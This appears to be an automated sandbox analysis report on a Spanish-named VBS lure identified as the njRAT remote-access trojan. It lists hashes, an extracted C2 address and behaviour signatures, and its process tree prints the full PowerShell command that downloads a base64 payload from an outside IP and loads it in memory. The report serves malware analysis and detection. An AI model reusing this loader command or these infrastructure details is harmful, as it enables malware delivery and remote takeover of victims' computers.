Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/10/2022, 06:14

General

  • Target

    56325762828282 COBRO JURIDICO.vbs

  • Size

    437KB

  • MD5

    3ae400fde403322cee0a88408828cba8

  • SHA1

    7aac489534006c5de8080d639f29f9fdcc5a0079

  • SHA256

    3b8b7f389603923a9fabf32a34ba6301ed3df38ee7eeaac068c8c108409b5532

  • SHA512

    2c435502f2900ed9d45c340e35e3f41110e6dfd981c60898bf30a4d8e971435f80674b6073d05faf33fae6ef7a907c3e9908586051155ced341878c5dfbb6084

  • SSDEEP

    48:kklC0eHz7/m7rJv4PsfbuUbNbbldPQ/Pe20NrFR4PLEvvldI:nl+/mrOeqUZldSPKNrY4vvldI

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://20.7.14.99/dll/dll_ink.pdf

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

proyecto23.dnsdojo.org:2023

Mutex

5b53b16e809d

Attributes
  • reg_key

    5b53b16e809d

  • splitter

    @!#&^%$

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 37 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\56325762828282 COBRO JURIDICO.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4832
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('0/YUskG/d/ee.etsap//:sptth'))
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2180
      • C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1504
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1552

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          6cf293cb4d80be23433eecf74ddb5503

          SHA1

          24fe4752df102c2ef492954d6b046cb5512ad408

          SHA256

          b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

          SHA512

          0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          7ae41ba310b3e0f4fc4c6eff982554fd

          SHA1

          1a382df614c494ff947f88817b9f0fbc76de3a68

          SHA256

          93939edea4456184f43eeffda4f6e82f125bf5cead24cebcf317aa3fe83efcce

          SHA512

          8e13185cab71046bb411dae56ccaabd547d3bf961c200fc307f2961eb9caf175dd08631ecf6512578dd333dac3640e653f93115c840b3344648f2a597e789223

        • memory/1504-136-0x00007FFA93F90000-0x00007FFA94A51000-memory.dmp

          Filesize

          10.8MB

        • memory/1552-137-0x0000000000400000-0x000000000040C000-memory.dmp

          Filesize

          48KB

        • memory/1552-142-0x00000000050D0000-0x000000000516C000-memory.dmp

          Filesize

          624KB

        • memory/1552-143-0x0000000005720000-0x0000000005CC4000-memory.dmp

          Filesize

          5.6MB

        • memory/1552-144-0x00000000052E0000-0x0000000005372000-memory.dmp

          Filesize

          584KB

        • memory/1552-145-0x0000000005200000-0x000000000520A000-memory.dmp

          Filesize

          40KB

        • memory/1552-146-0x0000000005470000-0x00000000054D6000-memory.dmp

          Filesize

          408KB

        • memory/2180-134-0x00007FFA93F90000-0x00007FFA94A51000-memory.dmp

          Filesize

          10.8MB

        • memory/2180-133-0x00000232F0F60000-0x00000232F0F82000-memory.dmp

          Filesize

          136KB

        • memory/2180-141-0x00007FFA93F90000-0x00007FFA94A51000-memory.dmp

          Filesize

          10.8MB